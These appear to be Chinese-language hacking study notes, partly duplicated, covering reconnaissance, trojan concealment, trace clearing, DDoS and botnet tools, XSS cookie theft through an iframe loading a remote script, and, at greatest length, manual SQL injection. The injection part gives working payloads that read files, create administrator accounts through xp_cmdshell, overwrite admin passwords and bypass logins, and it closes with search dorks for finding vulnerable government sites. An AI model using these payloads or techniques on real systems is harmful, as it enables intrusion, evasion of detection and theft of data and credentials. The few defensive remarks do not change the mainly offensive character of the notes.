漏扫:nessus,appscan
web应用:ibm appscan,awvs,webravor
手工渗透:
经验积累,可以去discuz论坛找漏洞知识看。
前期社会工程学积累:
域名:www.nihao.com,nslookup
企业信息:法人,联系人,地址,无线:bt5,卡王,奶瓶
虚拟主机:同个主机绑定多个域名
网络拓朴
发现漏洞
ftp用x-scan
清除痕迹用killer.exe
漏扫:nessus,appscan
web应用:ibm appscan,awvs,webravor
手工渗透:
经验积累,可以去discuz论坛找漏洞知识看。
前期社会工程学积累:
域名:www.nihao.com,nslookup
企业信息:法人,联系人,地址,无线:bt5,卡王,奶瓶
虚拟主机:同个主机绑定多个域名
网络拓朴
发现漏洞
ftp用x-scan
清除痕迹用killer.exe
病毒木马隐藏技术:
1.rar: 解压前:ma.exe
解压后:qq.exe
2.伪装成图片及记事本图标:.jpg .txt
3.利用捆绑器:正常文件和木马
4.源分发隐藏:即代码中就有木马了。
5.hook
6.文件资源区
7.进程守护:a,b,c
8.dll注入进程
9.dll本地劫持
手工杀马:
vmxp:
installrite:快照
snap1,snap2
avafind:硬盘快速索引:ntdhcp.exe
进程管理工具:icesword:冰刃,snipeword:狙剑
启动项:msconfig
服务:
文件位置:靠经验了
手工杀毒:
icesword:可疑进程
结束进程
icesword-进程--winlogin.exe--右键--模块信息--强制解除
ie劫持:
xss跨站:
注入主要针对服务端,跨站主要针对客户端,所有的输入点都是攻击源。
1.测试漏洞:<script>alert()</script>
2.挂马
<iframe src=http://ip/a.js></iframe>
POST方式要改成get
作用1:盗cookie
2.domain:路径
arp -a:显示本地arp缓存。
arp-s:绑定
防arp欺骗可以用静态arp缓存表
怎么绑?
arp -s ip mac这个会重启失效
突破arp防火墙:
基于内容的攻击
ddos:拒绝服务、分布式攻击
tcp三次握手:
S-syn:请求连接
F-fin:结束连接
A-ack:确认 acknumber=对方seq+1
R-rst:复位
三次握手
常用工具:nb,ntdos,中国网络制造,傀儡僵尸
挂马,外挂绑马:
one:配置远程控制木马:灰鸽子,pcshare,魔术,波尔。
pcshare无限版:--生成客户端 写ip,端口808未被占用
two:穿墙.dll注入ie进程
死亡之ping
阿拉丁:构造udp畸形包
nb用来控制肉鸡,用法:hosts复制到c:\winnt\system32\drivers\etc
启动http.exe--配置--目录:nb目录
专业抗dos设备:黑洞,冰盾
穿专业设备:全面模拟正常访问
php.ini
magic_quotes_gpc=on
单双引号,斜杠等前面加转义字符
union查询中如果是oracle数据库一定要加表名,而且前后表对应列的数据类型要兼容。利用这个可以判断前表那列的字符,
如果前表出错,将返回后表的结果
手工注入:
判断注入点 and1=1/and 1=2
判断用户名字id=-1 union select user()>0
判断版本号:id=-1 union select version()
判断当前连接数据库:id=-1unon select database()
判断表名:
id=-1 unionselect 1 from dv_admin
判断值:
id=-1 union select username from dv_admin
读文件:load_file(c:\boot.ini)路径要转为16进制
自动化工具:pangolin
1.数据库的提权
one: 先要建立数据库的用户,再将用户加入到sysadmin组(报错才是可能可以注入)
语句: ;exec master..sp_addlogin hyqkx1977,888888;--
two:把用户加入到sysadmin
three:查看数据用户
four:利用漏洞
数据库连接器:查询分析器--文件--连接:数据库服务器ip
2.操作系统的提权
one.建立操作系统的用户。
;exec master..xp_cmdshell 'net user hacker 88888 /add' --
two.将建立的用户加入administrastors组
;exec master..xp_cmdshell '
three:利用远程桌面连接:port 3389
3.能读系统文件
one:利用查询分析器连接数据库
two:create table tablename(....)
three bulk insert vvboot from 'c:\boot.ini'
four:select * from vvboot
4.能向系统写文件
装逼批处理代码:
cmd.cmd
start " good" /high cmd.cmd & exit
a.bat
:1
start iexplore.exe
goto 1
写文件
;exec master..xp_cmdshell 'echo aaa >>c:u.txt'--(两个大于号代表追加)
5.防xp_cmdshell
;exec master..sp_dropextendedproc 'xp_cmdshell'
终极防:
xp_cmdshell,防未公布溢出漏洞
删除所有权限,添加administrstor--完全控制
6.注入防范
WAF
手工注入MSSQL:
字典表,函数多
1.判断数据库类型
构造出错信息 and admin>0
2.判断注入点:
and 1=1
and 1=2
3.判断数据库的版本号:
and @@version>0
4.查看当前连接数据库用户名:
and user>o
dbo=sa mssql 1433端口配上弱口令无敌
5.查看当前连接数据库名:
and db_name()>0可能后来有些版本没了此函数
6.查看其它数据库:dbid=6,7,8
and (select name from master.dbo.sysdatabases where dbid=6)>1
7.判断表名:
and (select top 1 name from sysobjects where xtype='u' and status>0)>0
8.判断其他表:name not in ('xxx','xx')
9.判断列:
and (select Top 1 col_name(object_id('admin'),1)from sysobjects)>0
10.判断值:
and (select username from admin)>0
11.修改口令
update article.dbo.admin set password='a123456' where username='admin';--
--:注释符
php注释符#
入侵实例:方法
1.入侵论坛:dvbbs
#:%23
%:25
空格:%20 and %
id=1
id=9999999
第二个/替换为%5c
id[]=1
apsx:a.asp
jsp:%81,源代码
.Jsp
.js%2527
2.上传
判断注入点:
www.xx.xom/a.asp?id=1
and 1=1 返回正常
and 1=1 返回错误
and:逻辑与 A and B
or:逻辑与;A and B:只要一个为真结果都返真
万能口令:'or'='or'民办大学网站这样很多
判断数据库的类型:
access 独有表:mssysobjects
mssql:sysobjects
oracle:sys.user_tables
手工注入access
1.判断表名:admin;user,userinfo
判断表存在方法:(select count(*) from admin)>0
判断列存在方法:
and (select count(admin_user) from admin)>0
判断长度:len(admin_user)>4
and (select len(admin_user) from admin)>4
md5密码16位
判断值:left(admin_user,2)='aa'
and (select left(admin_user,i) from admin='a')
自动化工具:
domain,ad,管中
收索:
google : inurl:.gov asp+id
baidu: inurl:asp?id=
以上小心使用。
1.判断注入点
2.判断表名
3.判断列
4.判断列长度
5.判断值
6.自动化工具
穿山甲